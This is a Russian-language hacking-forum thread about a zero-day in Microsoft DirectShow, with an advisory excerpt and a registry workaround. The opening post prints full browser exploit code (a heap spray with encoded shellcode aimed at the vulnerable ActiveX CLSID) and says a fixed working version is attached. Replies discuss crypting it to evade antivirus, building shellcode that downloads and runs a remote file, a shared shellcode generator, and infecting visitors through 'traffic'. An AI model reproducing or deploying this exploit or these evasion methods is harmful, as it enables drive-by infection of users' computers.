Форум АНТИЧАТ - 0-day bugs в MS DirectShow (FINAL)

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Мировые новости (https://forum.antichat.xyz/forumdisplay.php?f=23)

- - 0-day bugs в MS DirectShow (FINAL) (https://forum.antichat.xyz/showthread.php?t=128650)

0-day bugs в MS DirectShow (Рабочий сплоит)

Как уже было написано раньше, существует уязвимость в DirectShow. Предыдущие новости все описывали что баг существует, но сплоита в паблике небыло.

И Вот сегодня появился сплоит в паблике (НО ВЕЗДЕ ОН БЫЛ НЕ РАБОЧИЙ)

Цитата:

Обнаружена активная эксплуатация еще одной уязвимости нулевого дня в Microsoft DirectShow. Согласно данным CSIS, в настоящий момент злоумышленники используют несколько тысяч новых скомпрометированных сайтов для распространения вредоносного кода, эксплуатируемого уязвимость в Microsoft DirectShow.

Также в открытом доступе находится эксплоит:
http://www.securitylab.ru/poc/382196.php

В качестве временного решения мы рекомендуем отключить уязвимую библиотеку:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\MicrosoftInternet explorer\ActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

(C) www.securitylab.ru

По адресу http://www.securitylab.ru/poc/382196.php
выложен сплоит:

Код:

var appllaa='0';

var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +

             "%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +

             "%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +

             "%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +

             "%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +

             "%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +

             "%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +

             "%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +

             "%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +

             "%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +

             "%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +

             "%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +

             "%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +

             "%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +

             "%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +

             "%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +

             "%u6363%u5251%u634c%u5553%u4550");

var headersize=20;

var omybro=unescape(nndx);

var slackspace=headersize+dashell.length;

while(omybro.length<slackspace)

omybro+=omybro;

bZmybr=omybro.substring(0,slackspace);

shuishiMVP=omybro.substring(0,omybro.length-slackspace);

while(shuishiMVP.length+slackspace<0x30000)

shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;

memory=new Array();

for(x=0;x<300;x++)

memory[x]=shuishiMVP+dashell;

var myObject=document.createElement('object');

DivID.appendChild(myObject);

myObject.width='1';

myObject.height='1';

myObject.data='./logo.gif';

myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Но он является не полным, по этому многие проверив, сразу увидели что толку от этого мало.

Поискав в инете на забугорном сайте и чуть подправив код, получаем рабочий сплоит!!

Протестировал на IE 7 - влегкую пробил осла, запустил калькулятор и закрыл осла.

В аттаче находится рабочий сплоит и картинка - которая как раз и является его основной частью.

P.S. Пароль на архив: a4at

Спасибо!
Может пригодиться;)

Хмм.. Действительно работает, IE упал, запустился калькулятор...
slesh +5

каспером уже палицо кстати.

2 nonamez так можно криптануть и будет норм наверное )

Кстате даже комодо палит)

http://s59.radikal.ru/i163/0907/32/6b1715b726a6.jpg

NOD32 молчит...

Как сгенерировать dashell (ShellCode) под свои нужды. К примеру запустить файл http://google.com/file.exe
Спасибо.

Воспользоваться генератором шелов. Если не ошибаюсь автор Proteus (ну покрайней мере автор ГУЕВ под него). Ищи на Метасплойте

http://www.metasploit.com/shellcode/

комодо почти все сплоиты палит :) у них там грамотно этот момент реализован,
остальным можно только поучиться.
з.ы. толку от сплоита мало, он разрешения требует на активх.

У меня не просило

да!
от сплойта толку мало
просит разрешения на активХ
думал как то обходится, или еще что то, но так ничего путнего не нашел.
два дня уже парюсь.
или же как то обходится?

Цитата:

Сообщение от Only

У меня не просило

логично предположить, что ты настройки безопасности в осле менял. по-умолчанию в IE 7 и выше activeX подгружаеться только с разрешения пользователя.

to elPiratos старо как мир, но всё таки ....

http://s54.radikal.ru/i143/0907/29/cc0c691493bft.jpg

Кому там генератор ШЕЛКОДОВ?

http://www.sendspace.com/file/brp2ry

Думаю протеус не против, не привт вроде. :-)

1) бьет запросто IE 6 и IE7
2) AX просит включить только при тестировании на локалхосте. Реально заливаете на любой сервак сплоит и тестируете - и все молчат.
3) брайзерозависимый крипт спасает от половины тех кто палит ) может даже больше
4) на IE8 непашет и не будет вроде пахать.
5) шелкод нормальный можно взять из любой связки. там их полно ) Я всяз кактойто маленький и прям хорошо работал на XP SP2, SP3, Win 2003 SP2

Цитата:

2) AX просит включить только при тестировании на локалхосте. Реально заливаете на любой сервак сплоит и тестируете - и все молчат.

нет, это скорее зависит от хоста, залил на пару своих, всё равно просит.

Цитата:

Сообщение от slesh

не бьет он на ие7
проверял траффом!
1-3% может всего.
все зависит от настроек в ие.
не верю!
дай линк пущу трафф, увидишь!